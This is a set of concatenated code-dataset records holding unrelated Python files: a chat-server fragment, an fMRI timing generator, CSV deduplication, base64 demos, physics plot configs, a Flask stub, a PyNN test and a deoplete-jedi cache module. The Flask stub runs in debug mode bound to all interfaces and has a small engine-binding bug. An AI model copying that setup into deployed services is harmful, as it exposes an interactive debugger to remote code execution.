message = 'Error, Invalid Command, {}!'.format(user['data'].decode().split(',')[0]).encode()\n message_header = f\"{len(message):<{20}}\".encode()\n notified_socket.send(user['header'] + user['data'] + message_header + message)\n # --- Commands end ---\n\n # It's not really necessary to have this, but will handle some socket exceptions just in case\n for notified_socket in exception_sockets:\n\n # Remove from list for socket.socket()\n sockets_list.remove(notified_socket)\n\n # Remove from online list of users\n del online_clients[notified_socket]","sub_path":"ass/OLD_WORKING/server copy.py","file_name":"server copy.py","file_ext":"py","file_size_in_byte":48475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"590730518","text":"\"\"\"\nSlow event-related design for HRF estimation for M1, V1, and A1.\n\nSingle-run task that includes the following conditions:\n- flashing checkerboard\n- finger tapping\n- listening to tones/music\n\nOriginally created by Jakub Kaczmarzyk and adapted to combine tasks.\n\"\"\"\n\nfrom __future__ import division, print_function\nimport os.path as op\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import gumbel_r\n\n# These tracks come from freepd.com and were converted from mp3 to wav\n# Some files have been shortened to reduce low-volume intros\n_AUDIO_FILES = [\n 'audio/Ambush_in_Rattlesnake_Gulch.wav',\n 'audio/Bleu.wav',\n 'audio/Bollywood_Groove.wav',\n 'audio/Breaking_Bollywood.wav',\n 'audio/Coy_Koi.wav',\n 'audio/Cumbish.wav',\n 'audio/Desert_Conflict.wav',\n 'audio/Funshine.wav',\n 'audio/Improv_for_Evil.wav', # starts at 4s\n 'audio/Jack_The_Lumberer.wav', # starts at 2.5s\n 'audio/Le_Baguette.wav', # starts at 1s\n 'audio/Shenzhen_Nightlife.wav',\n 'audio/Stereotype_News.wav', # starts at 1.5s\n 'audio/Ukulele_Song.wav']\n\n# General constants\nTOTAL_DURATION = 450\nTASK_TIME = 438 # time for trials in task\nLEAD_IN_DURATION = 6 # fixation before trials\nCONDITIONS = ['visual', 'visual/auditory', 'motor', 'motor/auditory']\nN_CONDS = len(CONDITIONS) # audio, checkerboard, tapping\n\n# Detection task constants\nN_BLOCKS_PER_COND = 4 # for each condition, for detection task\nBLOCK_TRIAL_DUR = 14\nBLOCK_ITI_DUR = 14\n\n# Estimation task constants\nN_TRIALS_PER_COND = 15 # for each condition, for estimation task\nN_TRIALS_TOTAL = N_TRIALS_PER_COND * N_CONDS\nDUR_RANGE = (0.5, 4) # avg of 3s\nITI_RANGE = (2, 8) # max determined to minimize difference from TASK_TIME\n\n\ndef randomize_carefully(elems, n_repeat=2):\n \"\"\"\n Shuffle without consecutive duplicates\n From https://stackoverflow.com/a/22963275/2589328\n \"\"\"\n s = set(elems)\n res = []\n for n in range(n_repeat):\n if res:\n # Avoid the last placed element\n lst = list(s.difference({res[-1]}))\n # Shuffle\n np.random.shuffle(lst)\n lst.append(res[-1])\n # Shuffle once more to avoid obvious repeating patterns in the last position\n lst[1:] = np.random.choice(lst[1:], size=len(lst)-1, replace=False)\n else:\n lst = elems[:]\n np.random.shuffle(lst)\n res.extend(lst)\n return res\n\n\ndef determine_detection_timing():\n \"\"\"\n Generates dataframe with timing info for block design version of task.\n \"\"\"\n durs = [BLOCK_TRIAL_DUR] * N_BLOCKS_PER_COND * N_CONDS\n itis = [BLOCK_ITI_DUR] * N_BLOCKS_PER_COND * N_CONDS\n trial_types = randomize_carefully(CONDITIONS, N_BLOCKS_PER_COND)\n timing_dict = {\n 'duration': durs,\n 'iti': itis,\n 'trial_type': trial_types,\n }\n timing_df = pd.DataFrame(timing_dict)\n return timing_df\n\n\ndef determine_estimation_timing(seed=None):\n \"\"\"\n Generates dataframe with timing info for event-related version of task.\n \"\"\"\n mu = 4 # mean of 4s\n raw_itis = gumbel_r.rvs(size=100000, loc=mu, scale=1)\n possible_itis = np.round(raw_itis, 1)\n # crop to 2-8s\n possible_itis = possible_itis[possible_itis >= 2]\n possible_itis = possible_itis[possible_itis <= 8]\n\n missing_time = np.finfo(dtype='float64').max\n if not seed:\n seed = np.random.randint(1000, 9999)\n\n while (not np.isclose(missing_time, 0.0, atol=10)) or (missing_time < 0):\n state = np.random.RandomState(seed=seed)\n durations = state.uniform(DUR_RANGE[0], DUR_RANGE[1], N_TRIALS_TOTAL)\n durations = np.round(durations, 1)\n\n itis = state.choice(possible_itis, size=N_TRIALS_TOTAL, replace=True)\n missing_time = TASK_TIME - np.sum([durations.sum(), itis.sum()])\n seed += 1\n\n trial_types = randomize_carefully(CONDITIONS, N_TRIALS_PER_COND)\n timing_dict = {\n 'duration': durations,\n 'iti': itis,\n 'trial_type': trial_types,\n }\n timing_df = pd.DataFrame(timing_dict)\n return timing_df, seed\n\n\ndef determine_timing(ttype, seed=None):\n if ttype not in ['Detection', 'Estimation']:\n raise Exception()\n\n n_audio_trials = N_TRIALS_PER_COND * len([k for k in CONDITIONS if 'auditory' in k])\n n_audio_stimuli = len(_AUDIO_FILES)\n n_repeats = int(np.ceil(n_audio_trials / n_audio_stimuli))\n audio_files = _AUDIO_FILES * n_repeats\n # Sampling method chosen to make number of dupes as equal as possible\n audio_files = np.random.choice(audio_files, n_audio_trials, replace=False)\n\n # set order of trials\n if ttype == 'Estimation':\n timing_df, seed = determine_estimation_timing(seed=seed)\n elif ttype == 'Detection':\n timing_df = determine_detection_timing()\n\n c = 0\n for trial in timing_df.index:\n if 'auditory' in timing_df.loc[trial, 'trial_type']:\n timing_df.loc[trial, 'stim_file'] = audio_files[c]\n c += 1\n else:\n timing_df.loc[trial, 'stim_file'] = None\n return timing_df, seed\n\n\ndef main():\n n_files = 100\n ttypes = ['Detection', 'Estimation']\n out_dir = op.realpath('../config/')\n seed = 1\n for i_file in range(1, n_files+1):\n for ttype in ttypes:\n df, seed = determine_timing(ttype, seed=seed)\n df.to_csv(op.join(out_dir, 'config_{0}_{1:05d}.tsv'.format(ttype, i_file)),\n sep='\\t', index=False, float_format='%.1f')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"task_preparation/generate_config_files.py","file_name":"generate_config_files.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"159795955","text":"import csv\n\nfull_urls = list()\n\nwith open('unique.csv') as f:\n reader = csv.reader(f)\n for row in reader:\n full_urls.append(row[-1].lower())\n\n\n\nwith open('unique.csv', 'a') as ff:\n writer = csv.writer(ff)\n\n with open('artist.csv') as f:\n reader = csv.reader(f)\n for row in reader:\n if row[-1].lower() not in full_urls:\n full_urls.append(row[-1].lower())\n writer.writerow(row)\n","sub_path":"unique/unique.py","file_name":"unique.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"223730146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport base64\n\n\ndef main():\n original_data = b\"This is the data, in the clear.\"\n print(\"Original : {} bytes {!r}\".format(len(original_data), original_data))\n\n b64_data = base64.b64encode(original_data)\n print(\"b64 Encoded: {} bytes {!r}\".format(len(b64_data), b64_data))\n\n b85_data = base64.b85encode(original_data)\n print(\"b85 Encoded: {} bytes {!r}\".format(len(b85_data), b85_data))\n\n a85_data = base64.a85encode(original_data)\n print(\"a85 Encoded: {} bytes {!r}\".format(len(a85_data), a85_data))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"standard/060.base64/base64_base85.py","file_name":"base64_base85.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"261768721","text":"from scipy.io import loadmat\n\n#### DATA PARAMETERS\nCLEAN_DATA_STUDENTS = \"data/cleandata_students.mat\"\nNOISY_DATA_STUDENTS = \"data/noisydata_students.mat\"\nNUM_ATTRIBUTES = 45\nATTRIBUTE_NUM_VALUES = 2 # we are dealing with binary numbers\nNUM_CLASSES = 6\n\n\n##### PART I: LOADING DATA\ndef load_data(filename):\n \"\"\" Returns the labels and examples array from the matlab with the given filename\"\"\"\n\n # load raw data\n mat = loadmat(filename, squeeze_me = True)\n\n # extract labels and examples from raw data\n examples = mat['x'] # N examples of 45 attributes each.\n labels = mat['y'] # N labels\n \n return examples, labels\n\n\ndef get_binary_targets(labels, label_index):\n \"\"\" Returns a list remapping labels according to the given label_index corresponding to an\n and emotion. A 1 indicates a positive example at that index & a 0 indicates a negative\n example.\n @params:\n labels: a list of the labels of the corresponding examples. Labels are numbered 1 to 6, the same as\n the total number of emotions.\n label_index : the emotion you want to map labels to.\"\"\"\n\n return map(lambda label: int(label == label_index), labels)\n\n","sub_path":"src/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"174043903","text":"#variables = {}\n\n# imported from cuts.py\n# cuts\n# imported from samples.py\n# samples signals\n\ntry:\n variables\nexcept NameError:\n import collections\n variables = collections.OrderedDict()\n cuts = []\n\nsr = [ckey for ckey in cuts if '_CR' not in ckey]\ncr = [ckey for ckey in cuts if '_CR' in ckey]\n\nnosignal = [skey for skey in samples if skey not in signals]\n\n#'fold' : # 0 = not fold (default), 1 = fold underflowbin, 2 = fold overflow bin, 3 = fold underflow and overflow\n\nvariables['events'] = {\n 'name': '0.5',\n 'range': (1,0,1),\n 'xaxis': 'events'\n}\n\nmthbinning = [60,80,90,100,110,120,130,150,200]\nmllbinning = [10,25,35,40,45,50,55,70,90,210]\nname = ''\nmllbin = ['1'] # folding underflow -> always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\nname += ' + %d*(' % (len(mllbinning) - 1)\nmthbin = [] # 1-1 for first bin\nfor imth in range(1, len(mthbinning) - 1):\n mthbin.append('(mth >= %d)' % mthbinning[imth])\nname += '+'.join(mthbin)\nname += ') - 0.5'\n\nvariables['mllVSmth_8x9'] = {\n 'name': name,\n 'range': (72, 0., 72.),\n 'xaxis': 'm^{ll}:m_{T}^{H}', # x axis name\n 'doWeight': 1, # do weighted plot too\n 'cuts': sr\n}\n\nmthbinning = [60,80,90,110,130,150,200]\nmllbinning = [10,25,40,50,70,90,210]\nname = ''\nmllbin = ['1'] # folding underflow -> always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\nname += ' + %d*(' % (len(mllbinning) - 1)\nmthbin = [] # 1-1 for first bin\nfor imth in range(1, len(mthbinning) - 1):\n mthbin.append('(mth >= %d)' % mthbinning[imth])\nname += '+'.join(mthbin)\nname += ') - 0.5'\n\nvariables['mllVSmth_6x6'] = {\n 'name': name,\n 'range': (36, 0., 36.),\n 'xaxis': 'm^{ll}:m_{T}^{H}', # x axis name\n 'doWeight': 1, # do weighted plot too\n 'cuts': sr\n}\n\nmthbinning = [60,80,90,110,130,150,200]\nmllbinning = [10,20,30,50,70,90,150]\nname = ''\nmllbin = ['1'] # folding underflow -> always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\nname += ' + %d*(' % (len(mllbinning) - 1)\nmthbin = [] # 1-1 for first bin\nfor imth in range(1, len(mthbinning) - 1):\n mthbin.append('(mth >= %d)' % mthbinning[imth])\nname += '+'.join(mthbin)\nname += ') - 0.5'\n\nvariables['mllVSmth_6x6low'] = {\n 'name': name,\n 'range': (36, 0., 36.),\n 'xaxis': 'm^{ll}:m_{T}^{H}',\n 'doWeight': 1,\n 'cuts': sr\n}\n\nmllbinning = [12,30,50,70,90,110,150,200]\nname = ''\nmllbin = ['0.5'] # folding underflow -> always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\n \nvariables['mll_optim'] = {\n 'name': name,\n 'range': (len(mllbinning) - 1, 0., len(mllbinning) - 1.),\n 'xaxis': 'imll',\n 'cuts': sr\n}\n\nmllbinning = [10,25,35,40,45,50,55,70,90,210]\n\nvariables['mll'] = {\n 'name': 'mll',\n 'range': (mllbinning,),\n 'xaxis': 'm^{ll} [GeV]', # x axis name\n 'doWeight': 1, # do weighted plot too\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['jet1Eta'] = {\n 'name': 'std_vector_jet_eta[0] * (std_vector_jet_pt[0] > 30.) - 5. * (std_vector_jet_pt[0] < 30.)',\n 'range': (50, -4.7, 4.7),\n 'xaxis': '#eta^{j1}',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['jet2Eta'] = {\n 'name': 'std_vector_jet_eta[1] * (std_vector_jet_pt[1] > 30.) - 5. * (std_vector_jet_pt[1] < 30.)',\n 'range': (50, -4.7, 4.7),\n 'xaxis': '#eta^{j2}',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['met'] = {\n 'name': 'metPfType1',\n 'range': (50, 0., 100.),\n 'xaxis': 'E_{T}^{miss} [GeV]',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['metPhi'] = {\n 'name': 'metPfType1Phi',\n 'range': (50, -math.pi, math.pi),\n 'xaxis': '#phi(E_{T}^{miss})',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['ptWW'] = {\n 'name': 'pTWW',\n 'range': (50, 0., 400.),\n 'xaxis': 'p_{T}^{WW} [GeV]',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['ht'] = {\n 'name': ('Sum$(std_vector_jet_pt * (std_vector_jet_pt > 30. && TMath::Abs(std_vector_jet_eta) < 4.7))',),\n 'range': (50, 0., 1000.),\n 'xaxis': 'H_{T} [GeV]',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\n#variables['njet'] = {\n# 'name': 'njet', \n# 'range': (5,0,5), \n# 'xaxis': 'Number of jets',\n# 'fold': 2,\n#}\n#\n#variables['ptllmet'] = {\n# 'name': 'ptH',\n# 'range': (100,0,300),\n# 'xaxis': 'p_{T}^{llmet} [GeV]',\n# 'fold': 3\n#}\n#\n#variables['ptllmet_reco'] = {\n# 'name': 'ptH',\n# 'range': (ptHBinning,),\n# 'xaxis': 'p_{T}^{llmet} [GeV]'\n#}\n#\n#variables['ptllmet_gen'] = {\n# 'name': 'higgsGenpt',\n# 'range': (ptHBinning,),\n# 'xaxis': 'p_{T}^{llmet} [GeV]',\n# 'samples': mc\n#}\n#\n#variables['rmat_pth'] = {\n# 'name': 'higgsGenpt:pTWW',\n# 'range': ([0.,15.,30.,45.,60.,80.,120.,200.,350.,400.],[0.,15.,30.,45.,60.,80.,120.,200.,350.,400.]),\n# 'xaxis': 'Reco p_{T}^{H} [GeV]',\n# 'yaxis': 'Gen p_{T}^{H} [GeV]',\n# 'fold': 2,\n# 'samples': ['ggH_hww']\n#}\n#\n#variables['rmat_njet'] = {\n# 'name': 'nGenJetCapped:njet',\n# 'range': ([0.,1.,2.,3.],[0.,1.,2.,3.]),\n# 'xaxis': 'Reco number of jets',\n# 'yaxis': 'Gen number of jets',\n# 'fold': 2,\n# 'samples': ['ggH_hww']\n#}\n\n# # just for fun plots:\n \n#variables['drll'] = { 'name': 'drll', # variable name \n# 'range': (100,0,2), # variable range\n# 'xaxis': 'DR_{ll}', # x axis name\n# 'fold': 3\n# }\n#\n#\n#variables['nvtx'] = { 'name': 'nvtx', \n# 'range': (40,0,40), \n# 'xaxis': 'nvtx', \n# 'fold': 3\n# }\n#\n#variables['mll'] = { 'name': 'mll', # variable name \n# 'range': (20,10,200), # variable range\n# 'xaxis': 'm_{ll} [GeV]', # x axis name\n# 'fold': 0\n# }\n# \n#variables['mth'] = { 'name': 'mth', # variable name \n# 'range': (10,60,200), # variable range\n# 'xaxis': 'm_{T}^{H} [GeV]', # x axis name\n# 'fold': 0\n# }\n#\n#variables['ptll'] = { 'name': 'ptll', # variable name \n# 'range': (20,0,200), # variable range\n# 'xaxis': 'pt_{ll} [GeV]', # x axis name\n# 'fold': 0\n# }\n#\n#variables['met'] = { 'name': 'metPfType1', # variable name \n# 'range': (20,0,200), # variable range\n# 'xaxis': 'pfmet [GeV]', # x axis name\n# 'fold': 0\n# }\n#\n#variables['dphill'] = { 'name': 'abs(dphill)', \n# 'range': (20,0,3.14), \n# 'xaxis': ' #Delta #phi_{ll}',\n# 'fold': 3\n# }\n#\n#variables['pt1'] = { 'name': 'std_vector_lepton_pt[0]', \n# 'range': (40,0,200), \n# 'xaxis': 'p_{T} 1st lep',\n# 'fold': 0 \n# }\n#\n#variables['pt2'] = { 'name': 'std_vector_lepton_pt[1]', \n# 'range': (40,0,100), \n# 'xaxis': 'p_{T} 2nd lep',\n# 'fold': 0 \n# }\n#\n#\n#\n#variables['eta1'] = { 'name': 'std_vector_lepton_eta[0]', \n# 'range': (20,-3,3), \n# 'xaxis': ' #eta 1st lep',\n# 'fold': 3 \n# }\n#\n#variables['eta2'] = { 'name': 'std_vector_lepton_eta[1]', \n# 'range': (20,-3,3), \n# 'xaxis': ' #eta 2nd lep',\n# 'fold': 3 \n# }\n#\n#variables['jetpt1'] = {\n# 'name': 'std_vector_jet_pt[0]', \n# 'range': (40,0,200), \n# 'xaxis': 'p_{T} 1st jet',\n# 'fold': 2 # 0 = not fold (default), 1 = fold underflowbin, 2 = fold overflow bin, 3 = fold underflow and overflow\n# }\n#\n#variables['jetpt2'] = {\n# 'name': 'std_vector_jet_pt[1]', \n# 'range': (40,0,200), \n# 'xaxis': 'p_{T} 2nd jet',\n# 'fold': 2 # 0 = not fold (default), 1 = fold underflowbin, 2 = fold overflow bin, 3 = fold underflow and overflow\n# }\n#\n#variables['jeteta1'] = { 'name': 'std_vector_jet_eta[0]',\n# 'range': (80,-5.0,5.0),\n# 'xaxis': ' #eta 1st jet',\n# 'fold': 0\n# }\n#\n#variables['jeteta2'] = { 'name': 'std_vector_jet_eta[1]',\n# 'range': (80,-5.0,5.0),\n# 'xaxis': ' #eta 2nd jet',\n# 'fold': 0\n# }\n","sub_path":"Configurations/Differential/ggH2016/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":9436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"469876210","text":"#!/usr/bin/env python2.7\n\nfrom flask import Flask, render_template, request, redirect, jsonify, url_for, flash\napp = Flask(__name__)\n\n# import CRUD Operations from Lesson 1\nfrom models import Base, User, Category, Wall, WallPhoto\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n# Create session and connect to # DB\nengine = create_engine('sqlite:///waldir.db')\nBase.metadata.bind = create_engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n@app.route('/')\ndef homepage():\n return render_template('homepage.html')\n\n\n\n# If you're executing me from the Python interpreter, do this:\n# If you're importing this file, don't do this:\nif __name__ == '__main__':\n # app.debug = True triggers a server reboot of sorts\n # if a change in the code is detected\n # as well as providing a debugger on the page\n app.debug = True\n app.run(host = '0.0.0.0', port = 8000)\n","sub_path":"vagrant/catalog/waldir.py","file_name":"waldir.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"618081081","text":"import matplotlib \n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport pyNN.nest as pynn\n\nN_NEURONS = 50\nw = 0.01\nsyn_delay = 1.\n\n# default_parameters = {\n # 'tau_refrac': 0.1,\n # 'cm': 1.0,\n # 'tau_syn_E': 5.0,\n # 'v_rest': -65.0,\n # 'tau_syn_I': 5.0,\n # 'tau_m': 20.0,\n # 'e_rev_E': 0.0,\n # 'i_offset': 0.0,\n # 'e_rev_I': -70.0,\n # 'v_thresh': -50.0,\n # 'v_reset': -65.0,\n# }\n\nneuron_parameters = {\n 'v_thresh': -35.0, \n 'tau_m': 20.,\n 'tau_syn_E': 10.0, \n 'e_rev_E': 0., \n 'tau_refrac': 0.1 , \n 'v_reset': -50.0, #hdbrgs\n 'tau_syn_I': 5., \n 'i_offset': 0.0,\n #ESS - BrainScaleS\n 'cm': 0.2,\n 'v_rest': -50.0,\n 'e_rev_I': -100.,\n} \n\npynn.setup(timestep=1.0)\n\nneurons = pynn.Population(N_NEURONS, \n pynn.IF_cond_exp(**neuron_parameters),\n )\nneurons.record('spikes')\n\ninputs = pynn.Population(N_NEURONS, \n pynn.SpikeSourcePoisson(rate=10.0),\n )\n\nsyn = pynn.StaticSynapse(weight=w, delay=syn_delay)\nproj = pynn.Projection(inputs, neurons,\n pynn.OneToOneConnector(), syn)\n\npynn.run(1000)\ndata = neurons.get_data().segments[0]\nout_spikes = np.array(data.spiketrains)\n\npynn.end()\n\nplt.figure()\nfor nid, times in enumerate(out_spikes):\n plt.plot(times, np.ones_like(times)*nid, '.b', markersize=1)\nplt.savefig(\"output.pdf\")\nplt.show()\n\n\n\n\n","sub_path":"codebase/tests/test_new_nest.py","file_name":"test_new_nest.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"294611346","text":"import glob\nimport hashlib\nimport json\nimport logging\nimport os\nimport re\nimport subprocess\nimport threading\nimport time\nfrom itertools import chain\nfrom string import whitespace\n\nfrom deoplete_jedi import utils\n\n_paths = []\n_cache_path = None\n# List of items in the file system cache. `import~` is a special key for\n# caching import modules. It should not be cached to disk.\n_file_cache = set(['import~'])\n\n# Cache version allows us to invalidate outdated cache data structures.\n_cache_version = 17\n_cache_lock = threading.RLock()\n_cache = {}\n\n# Python program to use, gets set from Source.on_init.\npython_path = None\n\nlog = logging.getLogger('deoplete.jedi.cache')\n\n# This uses [\\ \\t] to avoid spanning lines\n_import_re = re.compile(r'''\n ^[\\ \\t]*(\n from[\\ \\t]+[\\w\\.]+[\\ \\t]+import\\s+\\([\\s\\w,]+\\)|\n from[\\ \\t]+[\\w\\.]+[\\ \\t]+import[\\ \\t\\w,]+|\n import[\\ \\t]+\\([\\s\\w,]+\\)|\n import[\\ \\t]+[\\ \\t\\w,]+\n )\n''', re.VERBOSE | re.MULTILINE)\n\n\nclass CacheEntry(object):\n def __init__(self, dict):\n self.key = tuple(dict.get('cache_key'))\n self._touched = time.time()\n self.time = dict.get('time')\n self.modules = dict.get('modules')\n self.completions = dict.get('completions', [])\n self.refresh = False\n if self.completions is None:\n self.refresh = True\n self.completions = []\n\n def update_from(self, other):\n self.key = other.key\n self.time = other.time\n self.modules = other.modules\n self.completions = other.completions\n\n def touch(self):\n self._touched = time.time()\n\n def to_dict(self):\n return {\n 'version': _cache_version,\n 'cache_key': self.key,\n 'time': self.time,\n 'modules': self.modules,\n 'completions': self.completions,\n }\n\n\ndef get_cache_path():\n global _cache_path\n if not _cache_path or not os.path.isdir(_cache_path):\n p = subprocess.Popen([python_path, '-V'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = p.communicate()\n version = re.search(r'(\\d+\\.\\d+)\\.', (stdout or stderr).decode('utf8')).group(1)\n cache_dir = os.getenv('XDG_CACHE_HOME', '~/.cache')\n cache_dir = os.path.join(os.path.expanduser(cache_dir), 'deoplete/jedi',\n version)\n if not os.path.exists(cache_dir):\n umask = os.umask(0)\n os.makedirs(cache_dir, 0o0700)\n os.umask(umask)\n _cache_path = cache_dir\n return _cache_path\n\n\ndef retrieve(key):\n if not key:\n return None\n\n with _cache_lock:\n if key[-1] == 'package' and key[0] not in _file_cache:\n # This will only load the cached item from a file the first time it\n # was seen.\n cache_file = os.path.join(get_cache_path(), '{}.json'.format(key[0]))\n if os.path.isfile(cache_file):\n with open(cache_file, 'rt') as fp:\n try:\n data = json.load(fp)\n if data.get('version', 0) >= _cache_version:\n _file_cache.add(key[0])\n cached = CacheEntry(data)\n cached.time = time.time()\n _cache[key] = cached\n log.debug('Loaded from file: %r', key)\n return cached\n except Exception:\n pass\n cached = _cache.get(key)\n if cached:\n cached.touch()\n return cached\n\n\ndef store(key, value):\n with _cache_lock:\n if not isinstance(value, CacheEntry):\n value = CacheEntry(value)\n\n if value.refresh:\n # refresh is set when completions is None. This will be due to\n # Jedi producing an error and not getting any completions. Use any\n # previously cached completions while a refresh is attempted.\n old = _cache.get(key)\n if old is not None:\n value.completions = old.completions\n\n _cache[key] = value\n\n if key[-1] == 'package' and key[0] not in _file_cache:\n _file_cache.add(key[0])\n cache_file = os.path.join(get_cache_path(), '{}.json'.format(key[0]))\n with open(cache_file, 'wt') as fp:\n json.dump(value.to_dict(), fp)\n log.debug('Stored to file: %r', key)\n return value\n\n\ndef exists(key):\n with _cache_lock:\n return key in _cache\n\n\ndef reap_cache(max_age=300):\n \"\"\"Clear the cache of old items\n\n Module level completions are exempt from reaping. It is assumed that\n module level completions will have a key length of 1.\n \"\"\"\n while True:\n time.sleep(300)\n\n with _cache_lock:\n now = time.time()\n cur_len = len(_cache)\n for cached in list(_cache.values()):\n if cached.key[-1] not in ('package', 'local', 'boilerplate~',\n 'import~') \\\n and now - cached._touched > max_age:\n _cache.pop(cached.key)\n\n if cur_len - len(_cache) > 0:\n log.debug('Removed %d of %d cache items', len(_cache), cur_len)\n\n\ndef cache_processor_thread(compl_queue):\n errors = 0\n while True:\n try:\n compl = compl_queue.get()\n cache_key = compl.get('cache_key')\n cached = retrieve(cache_key)\n if cached is None or cached.time <= compl.get('time'):\n cached = store(cache_key, compl)\n log.debug('Processed: %r', cache_key)\n errors = 0\n except Exception as e:\n errors += 1\n if errors > 3:\n break\n log.error('Got exception while processing: %r', e)\n\n\ndef start_background(compl_queue):\n log.debug('Starting reaper thread')\n t = threading.Thread(target=cache_processor_thread, args=(compl_queue,))\n t.daemon = True\n t.start()\n t = threading.Thread(target=reap_cache)\n t.daemon = True\n t.start()\n\n\n# balanced() taken from:\n# http://stackoverflow.com/a/6753172/4932879\n# Modified to include string delimiters\ndef _balanced():\n # Doc strings might be an issue, but we don't care.\n idelim = iter(\"\"\"(){}[]\"\"''\"\"\")\n delims = dict(zip(idelim, idelim))\n odelims = {v: k for k, v in delims.items()}\n closing = delims.values()\n\n def balanced(astr):\n \"\"\"Test if a string has balanced delimiters.\n\n Returns a boolean and a string of the opened delimiter.\n \"\"\"\n stack = []\n skip = False\n open_d = ''\n open_str = ''\n for c in astr:\n if c == '\\\\':\n skip = True\n continue\n if skip:\n skip = False\n continue\n d = delims.get(c, None)\n if d and not open_str:\n if d in '\"\\'':\n open_str = d\n open_d = odelims.get(d)\n stack.append(d)\n elif c in closing:\n if c == open_str:\n open_str = ''\n if not open_str and (not stack or c != stack.pop()):\n return False, open_d\n if stack:\n open_d = odelims.get(stack[-1])\n else:\n open_d = ''\n return not stack, open_d\n return balanced\nbalanced = _balanced() # noqa: E305\n\n\ndef split_module(text, default_value=None):\n \"\"\"Utility to split the module text.\n\n If there is nothing to split, return `default_value`.\n \"\"\"\n b, d = balanced(text)\n if not b:\n # Handles cases where the cursor is inside of unclosed delimiters.\n # If the input is: re.search(x.spl\n # The returned value should be: x\n if d and d not in '\\'\"':\n di = text.rfind(d)\n if di != -1:\n text = text[di + 1:]\n else:\n return default_value\n m = re.search(r'([\\S\\.]+)$', text)\n if m and '.' in m.group(1):\n return m.group(1).rsplit('.', 1)[0]\n return default_value\n\n\ndef get_parents(source, line, class_only=False):\n \"\"\"Find the parent blocks\n\n Collects parent blocks that contain the current line to help form a cache\n key based on variable scope.\n \"\"\"\n parents = []\n start = line - 1\n indent = len(source[start]) - len(source[start].lstrip())\n if class_only:\n pattern = r'^\\s*class\\s+(\\w+)'\n else:\n pattern = r'^\\s*(?:def|class)\\s+(\\w+)'\n\n for i in range(start, 0, -1):\n s_line = source[i].lstrip()\n l_indent = len(source[i]) - len(s_line)\n if s_line and l_indent < indent:\n m = re.search(pattern, s_line)\n indent = l_indent\n if m:\n parents.insert(0, m.group(1))\n\n return parents\n\n\ndef full_module(source, obj):\n \"\"\"Construct the full module path\n\n This finds all imports and attempts to reconstruct the full module path.\n If matched on a standard `import` line, `obj` itself is a full module path.\n On `from` import lines, the parent module is prepended to `obj`.\n \"\"\"\n\n module = ''\n obj_pat = r'(?:(\\S+)\\s+as\\s+)?\\b{0}\\b'.format(re.escape(obj.split('.', 1)[0]))\n for match in _import_re.finditer('\\n'.join(source)):\n module = ''\n imp_line = ' '.join(match.group(0).split())\n if imp_line.startswith('from '):\n _, module, imp_line = imp_line.split(' ', 2)\n m = re.search(obj_pat, imp_line)\n if m:\n # If the import is aliased, use the alias as part of the key\n alias = m.group(1)\n if alias:\n obj = obj.split('.')\n obj[0] = alias\n obj = '.'.join(obj)\n if module:\n return '.'.join((module, obj))\n return obj\n return None\n\n\ndef sys_path(refresh=False):\n global _paths\n if not _paths or refresh:\n p = subprocess.Popen([\n python_path,\n '-c', r'import sys; print(\"\\n\".join(sys.path))',\n ], stdout=subprocess.PIPE)\n stdout, _ = p.communicate()\n _paths = [x for x in stdout.decode('utf8').split('\\n')\n if x and os.path.isdir(x)]\n return _paths\n\n\ndef is_package(module, refresh=False):\n \"\"\"Test if a module path is an installed package\n\n The current interpreter's sys.path is retrieved on first run.\n \"\"\"\n if re.search(r'[^\\w\\.]', module):\n return False\n\n paths = sys_path(refresh)\n\n module = module.split('.', 1)[0]\n pglobs = [os.path.join(x, module, '__init__.py') for x in paths]\n pglobs.extend([os.path.join(x, '{}.*'.format(module)) for x in paths])\n return any(map(glob.glob, pglobs))\n\n\ndef cache_context(filename, context, source, extra_path): # noqa: C901\n \"\"\"Caching based on context input.\n\n If the input is blank, it was triggered with `.` to get module 